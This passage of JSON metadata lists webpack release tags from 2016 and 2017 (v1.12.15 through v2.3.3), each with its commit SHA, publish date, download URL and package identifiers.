"published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-